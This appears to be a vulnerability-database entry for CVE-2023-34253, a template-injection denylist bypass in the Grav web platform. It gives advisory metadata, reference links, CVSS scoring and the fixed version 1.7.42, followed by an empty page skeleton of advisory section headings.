                "lang": "eng",
                "value": "CWE-1336: Improper Neutralization of Special Elements Used in a Template Engine"
              }
            ]
          }
        ]
      },
      "references": {
        "reference_data": [
          {
            "name": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
          },
          {
            "name": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
          },
          {
            "name": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190",
            "refsource": "MISC",
            "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
          },
          {
            "name": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/",
            "refsource": "MISC",
            "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
          },
          {
            "name": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83",
            "refsource": "MISC",
            "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
          }
        ]
      },
      "source": {
        "advisory": "GHSA-j3v8-v77f-fvgm",
        "discovery": "UNKNOWN"
      }
    },
    "gitlab.com": {
      "advisories": [
        {
          "affected_range": "\u003c1.7.42",
          "affected_versions": "All versions before 1.7.42",
          "cvss_v3": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
          "cwe_ids": [
            "CWE-1035",
            "CWE-78",
            "CWE-937",
            "CWE-94"
          ],
          "date": "2023-07-01",
          "description": "Grav is a file-based Web platform. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist.",
          "fixed_versions": [
            "1.7.42"
          ],
          "identifier": "CVE-2023-34253",
          "identifiers": [
            "GHSA-j3v8-v77f-fvgm",
            "CVE-2023-34253"
          ],
          "not_impacted": "All versions starting from 1.7.42",
          "package_slug": "packagist/getgrav/grav",
          "pubdate": "2023-06-16",
          "solution": "Upgrade to version 1.7.42 or above.",
          "title": "Improper Control of Generation of Code (\u0027Code Injection\u0027)",
          "urls": [
            "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm",
            "https://nvd.nist.gov/vuln/detail/CVE-2023-34253",
            "https://github.com/getgrav/grav/commit/244758d4383034fe4cd292d41e477177870b65ec",
            "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
            "https://github.com/getgrav/grav/commit/8c2c1cb72611a399f13423fc6d0e1d998c03e5c8",
            "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5",
            "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190",
            "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/",
            "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83",
            "https://github.com/advisories/GHSA-j3v8-v77f-fvgm"
          ],
          "uuid": "9f43c13b-30e8-4ce4-a2e2-23517b114294"
        }
      ]
    },
    "nvd.nist.gov": {
      "configurations": {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [],
            "cpe_match": [
              {
                "cpe23Uri": "cpe:2.3:a:getgrav:grav:*:*:*:*:*:*:*:*",
                "cpe_name": [],
                "versionEndExcluding": "1.7.42",
                "vulnerable": true
              }
            ],
            "operator": "OR"
          }
        ]
      },
      "cve": {
        "CVE_data_meta": {
          "ASSIGNER": "security-advisories@github.com",
          "ID": "CVE-2023-34253"
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "en",
              "value": "Grav is a file-based Web platform. Prior to version 1.7.42, the denylist introduced in commit 9d6a2d to prevent dangerous functions from being executed via injection of malicious templates was insufficient and could be easily subverted in multiple ways -- (1) using unsafe functions that are not banned, (2) using capitalised callable names, and (3) using fully-qualified names for referencing callables. Consequently, a low privileged attacker with login access to Grav Admin panel and page creation/update permissions is able to inject malicious templates to obtain remote code execution. A patch in version 1.7.42 improves the denylist."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "en",
                  "value": "CWE-94"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://www.github.com/getgrav/grav/commit/9d6a2dba09fd4e56f5cdfb9a399caea355bfeb83"
            },
            {
              "name": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190",
              "refsource": "MISC",
              "tags": [
                "Issue Tracking"
              ],
              "url": "https://github.com/getgrav/grav/blob/1.7.40/system/src/Grav/Common/Utils.php#L1952-L2190"
            },
            {
              "name": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Third Party Advisory"
              ],
              "url": "https://huntr.dev/bounties/3ef640e6-9e25-4ecb-8ec1-64311d63fe66/"
            },
            {
              "name": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm",
              "refsource": "MISC",
              "tags": [
                "Exploit",
                "Vendor Advisory"
              ],
              "url": "https://github.com/getgrav/grav/security/advisories/GHSA-j3v8-v77f-fvgm"
            },
            {
              "name": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b",
              "refsource": "MISC",
              "tags": [
                "Patch"
              ],
              "url": "https://github.com/getgrav/grav/commit/71bbed12f950de8335006d7f91112263d8504f1b"
            }
          ]
        }
      },
      "impact": {
        "baseMetricV3": {
          "cvssV3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.2,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "HIGH",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "exploitabilityScore": 1.2,
          "impactScore": 5.9
        }
      },
      "lastModifiedDate": "2023-06-23T17:48Z",
      "publishedDate": "2023-06-14T23:15Z"
    }
  }
}

Sightings

Author	Source	Type	Date

Nomenclature

Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
Confirmed: The vulnerability is confirmed from an analyst perspective.
Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
Patched: This vulnerability was successfully patched by the user reporting the sighting.
Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
Not confirmed: The user expresses doubt about the veracity of the vulnerability.
Not patched: This vulnerability was not successfully patched by the user reporting the sighting.

Action not permitted

CVE-2023-34253 (GCVE-0-2023-34253)

Vulnerability from cvelistv5

ghsa-j3v8-v77f-fvgm

Vulnerability from github

Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability

Summary:

CVSS3.1 Scoring System:

Product Overview:

Vulnerability Summary:

Vulnerability Details:

Exploit Conditions:

Reproduction Steps:

Suggested Mitigations:

Detection Guidance:

Credits:

fkie_cve-2023-34253

Vulnerability from fkie_nvd

gsd-2023-34253

Vulnerability from gsd

Tags

Sightings

Nomenclature